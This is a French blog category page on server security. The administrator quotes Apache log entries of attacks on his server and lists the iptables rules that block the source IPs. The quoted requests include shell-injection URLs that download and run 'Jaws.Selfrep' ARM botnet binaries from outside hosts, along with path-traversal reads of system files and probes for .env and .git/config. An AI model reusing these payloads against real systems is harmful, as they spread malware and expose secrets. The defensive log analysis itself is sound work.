Archives de catégorie : Sécurité

Liste des IP bloqués

Publié le par
Répondre

J’ai donc bloqué des IP suivantes :

42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"

Le plus grand nombre venait de cette IP :

IP Address Country Region City
42.193.42.236 China Beijing Beijing
ISP Organization Latitude Longitude
Tencent Cloud Computing (Beijing) Co. Ltd. Not Available 39.9075 116.3972

Le blocage :

#  iptables -A INPUT -s 42.193.42.236 -j DROP
#  iptables -A INPUT -s 47.106.177.157 -j DROP
#  iptables -A INPUT -s 31.44.185.235 -j DROP
#  iptables -A INPUT -s 80.94.93.125 -j DROP
#  iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

Faille de sécurité : NW_BBBarm7 ?

Publié le par
Répondre

J’ai pu voir dans les logs :

59.21.219.217 - - [01/Apr/2022:03:31:59 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.103.237.21 - - [01/Apr/2022:03:32:24 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
39.105.54.139 - - [01/Apr/2022:04:24:22 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.85.179.149 - - [01/Apr/2022:09:06:42 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBBarm;+chmod+777+NW_BBBarm;+./NW_BBBarm Jaws.Selfrep;rm+-rf+NW_BBBarm" 400 0 "-" "-"
222.178.152.80 - - [01/Apr/2022:09:46:47 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
123.56.177.98 - - [01/Apr/2022:10:14:00 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
222.173.108.94 - - [01/Apr/2022:11:42:19 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"

J’ai donc filtré les IP :

#  iptables -A INPUT -s 59.21.219.217 -j DROP
#  iptables -A INPUT -s 39.103.237.21 -j DROP
#  iptables -A INPUT -s 39.105.54.139 -j DROP
#  iptables -A INPUT -s 222.85.179.149 -j DROP
#  iptables -A INPUT -s 222.178.152.80 -j DROP
#  iptables -A INPUT -s 123.56.177.98 -j DROP
#  iptables -A INPUT -s 222.173.108.94 -j DROP
#  iptables -A INPUT -s 51.81.133.91 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

L’ip : 51.81.133.91

Localisation R.A.S. chinoise de Hong Kong
Réputation 100 %
Anonymat Aucun détection
Usage Attribué
Source ARIN
Nom d’hote ip91.ip-51-81-133.us

 

J’ai pu voir aussi :

# grep " 400 " /var/log/apache2/access.humhub.log | grep shell | grep -v NW_BBBarm
39.103.239.37 - - [01/Apr/2022:00:34:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
41.36.111.76 - - [01/Apr/2022:05:06:53 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws" 400 0 "-" "-"
47.100.208.164 - - [01/Apr/2022:06:24:45 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"
39.103.232.57 - - [01/Apr/2022:09:36:04 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/146.0.75.242/YourName/BinName.arm;+chmod+777+BinName.arm;+./BinName.arm Jaws.Selfrep;rm+-rf+BinName.arm" 400 0 "-" "-"

J’ai donc filtré :

#  iptables -A INPUT -s 39.103.239.37 -j DROP
#  iptables -A INPUT -s 41.36.111.76 -j DROP
#  iptables -A INPUT -s 47.100.208.164 -j DROP
#  iptables -A INPUT -s 39.103.232.57 -j DROP
#  iptables -A INPUT -s 146.0.75.242 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

L’IP :146.0.75.242

Localisation Pays-Bas
Réputation 86 %
Anonymat Aucun détection
Usage Attribué
Source RIPE
Nom d’hote 146.0.75.242

Securité : Il est important de bloquer les IPs Russes : 45.146.165.37 & 5.188.210.227 & 5.8.10.202

En passant

Répondre
IP Address Country Region City
45.146.165.37 Russian Federation Sankt-Peterburg Saint Petersburg
ISP Organization Latitude Longitude
Mastercom LLC Not Available 59.8944 30.2642
IP Address Country Region City
5.188.210.227 Russian Federation Sankt-Peterburg Saint Petersburg
ISP Organization Latitude Longitude
Petersburg Internet Network Ltd. Not Available 59.8944 30.2642
IP Address Country Region City
5.8.10.202 Russian Federation Sankt-Peterburg Saint Petersburg
ISP Organization Latitude Longitude
Petersburg Internet Network Ltd. Not Available 59.8944 30.2642

J’ai des grosses attaques via cette IP :

# iptables -L -n -v -x | grep " DROP" | awk '{print $1 " " $8}' | grep -v "0 " | sort -n
1 185.142.236.40
1 185.165.190.17
1 192.241.206.102
1 192.241.206.232
1 192.241.208.45
1 192.241.208.5
1 192.241.209.114
1 192.241.209.26
1 192.241.211.59
1 192.241.211.81
1 31.220.3.140
1 80.82.77.139
1 89.248.168.215
2 170.210.45.163
2 192.241.209.77
2 192.241.211.11
2 192.241.211.83
2 49.143.32.6
3 185.142.236.43
3 192.241.205.65
3 192.241.211.186
3 212.154.7.246
3 89.248.165.73
5 172.104.131.24
5 178.239.21.164
5 45.134.144.108
6 161.97.87.64
6 199.117.154.162
6 89.248.165.52
15 109.237.103.118
35 61.219.11.151
46 23.251.102.74
72 40.77.167.103
97 5.8.10.202
315 5.188.210.227
1516 45.146.165.37

Securité : Blocage de 167.99.133.28 suite à un scan

En passant

Répondre
Localisation États-Unis
Réputation 71 %
Anonymat Aucun détection
Usage Attribué
Source ARIN
Nom d’hote probe-de001.rand0.leakix.org

Le scan en question :

167.99.133.28 - - [01/Mar/2022:00:59:10 +0100] "GET / HTTP/1.1" 400 5127 "-" "-"
167.99.133.28 - - [01/Mar/2022:00:59:43 +0100] "GET / HTTP/1.1" 302 5553 "-" "l9tcpid/v1.1.0"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "PUT /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 302 5365 "-" "Go-http-client/1.1"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts HTTP/1.1" 400 5635 "-" "Lkx-TraversalHttpPlugin/0.0.1 (+https://leakix.net/, +https://twitter.com/HaboubiAnis)"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /.DS_Store HTTP/1.1" 403 5606 "-" "Go-http-client/1.1"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /telescope/requests HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:45 +0100] "GET /info.php HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /favicon.ico HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /api/geojson?url=file:///etc/hosts HTTP/1.1" 404 5505 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /login.action HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /debug/default/view?panel=config HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /.env HTTP/1.1" 403 5606 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /v2/_catalog HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:46 +0100] "GET /api/search?folderIds=0 HTTP/1.1" 404 5504 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:47 +0100] "GET /config.json HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:47 +0100] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:47 +0100] "GET /frontend_dev.php/$ HTTP/1.1" 302 5553 "-" "l9explore/1.3.0"
167.99.133.28 - - [01/Mar/2022:00:59:48 +0100] "GET /.git/config HTTP/1.1" 403 5606 "-" "l9explore/1.3.0"